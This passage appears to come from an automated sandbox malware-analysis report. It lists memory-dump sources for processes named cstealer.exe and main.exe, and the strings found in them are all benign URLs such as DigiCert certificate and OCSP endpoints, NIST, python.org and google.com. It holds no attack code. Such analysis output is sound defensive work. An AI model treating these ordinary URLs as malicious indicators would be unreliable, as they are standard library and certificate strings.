00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2226157395.000002004DDFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187842402.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189591439.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189591439.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187842402.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: cstealer.exe, 00000049.00000003.2467259696.000001DB63733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: cstealer.exe, 00000003.00000003.2447371175.00000271DA548000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2396655837.00000271DA542000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2455332650.00000271D9E2D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2542350232.00000271D9E45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2470513280.00000271D9E3D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552117911.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2443600130.00000271DA542000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2285480020.0000020103095000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289769718.00000201030A0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276614060.0000020103094000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287958996.0000020103095000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289172640.0000020103097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
                                Source: cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177844870.00000271DA4D6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                                Source: cstealer.exe, 00000003.00000003.2527962136.00000271DA17F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537885870.00000271DA18C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2519598138.00000271DA17E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537371997.00000271DA185000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177398207.00000271DA184000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501756441.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179117059.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2176664163.00000271DA486000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2183488711.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102DEC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290930130.0000020102DFF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                Source: cstealer.exe, 00000003.00000003.2176699163.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473981755.00000271DA3BD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2176699163.00000271DA3BF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2682223579.00000271DA3C8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3C2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2281174075.0000020102D30000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289034063.0000020102D34000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2288580878.0000020102D33000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2325946516.0000020102D44000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                Source: cstealer.exe, 00000003.00000003.2536067698.00000271DA060000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2454347629.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2627252924.00000271D9E66000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2650778065.00000271DA063000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2542654022.00000271D9E65000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2534726372.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274584655.0000020102A87000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275350544.0000020102A8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2314389620.0000020102AA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                Source: cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2314389620.0000020102AA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286765281.000002010308C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102A97000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280491817.00000201030B6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284549098.000002010308B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2226157395.000002004DDFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189591439.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 